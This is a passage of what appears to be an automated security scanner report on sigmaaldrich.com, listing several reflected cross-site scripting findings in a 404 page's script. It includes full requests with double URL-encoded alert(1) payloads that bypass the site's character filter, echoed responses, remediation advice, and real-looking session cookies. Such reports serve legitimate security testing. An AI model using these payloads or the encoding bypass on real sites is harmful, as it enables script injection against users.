Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:19 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/site-level/privacy-policyb2011";alert(1)//1d4c5be287d","E404") ;
   </script>
...[SNIP]...

1.218. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf095%2522%253balert%25281%2529%252f%252f236ed0f1918 was submitted in the REST URL parameter 1. This input was echoed as cf095";alert(1)//236ed0f1918 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentcf095%2522%253balert%25281%2529%252f%252f236ed0f1918/sigma-aldrich/technical-service/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentcf095";alert(1)//236ed0f1918/sigma-aldrich/technical-service/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.219. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 498c8%2522%253balert%25281%2529%252f%252f79494c4480b was submitted in the REST URL parameter 2. This input was echoed as 498c8";alert(1)//79494c4480b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich498c8%2522%253balert%25281%2529%252f%252f79494c4480b/technical-service/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:32 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich498c8";alert(1)//79494c4480b/technical-service/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.220. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac96a%2522%253balert%25281%2529%252f%252f5c2cde5b8b5 was submitted in the REST URL parameter 3. This input was echoed as ac96a";alert(1)//5c2cde5b8b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-serviceac96a%2522%253balert%25281%2529%252f%252f5c2cde5b8b5/technical-service-home/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:34 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-serviceac96a";alert(1)//5c2cde5b8b5/technical-service-home/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.221. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5959%2522%253balert%25281%2529%252f%252fd68bc01eb63 was submitted in the REST URL parameter 4. This input was echoed as e5959";alert(1)//d68bc01eb63 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-homee5959%2522%253balert%25281%2529%252f%252fd68bc01eb63/enews-subscription HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 28985
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/technical-service/technical-service-homee5959";alert(1)//d68bc01eb63/enews-subscription","E404") ;
   </script>
...[SNIP]...

1.222. http://www.sigmaaldrich.com/content/sigma-aldrich/technical-service/technical-service-home/enews-subscription [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/technical-service/technical-service-home/enews-subscription

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8fa8%2522%253balert%25281%2529%252f%252f22e7bdf4d51 was submitted in the REST URL parameter 5. This input was echoed as c8fa8";alert(1)//22e7bdf4d51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/technical-service/technical-service-home/enews-subscriptionc8fa8%2522%253balert%25281%2529%252f%252f22e7bdf4d51 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
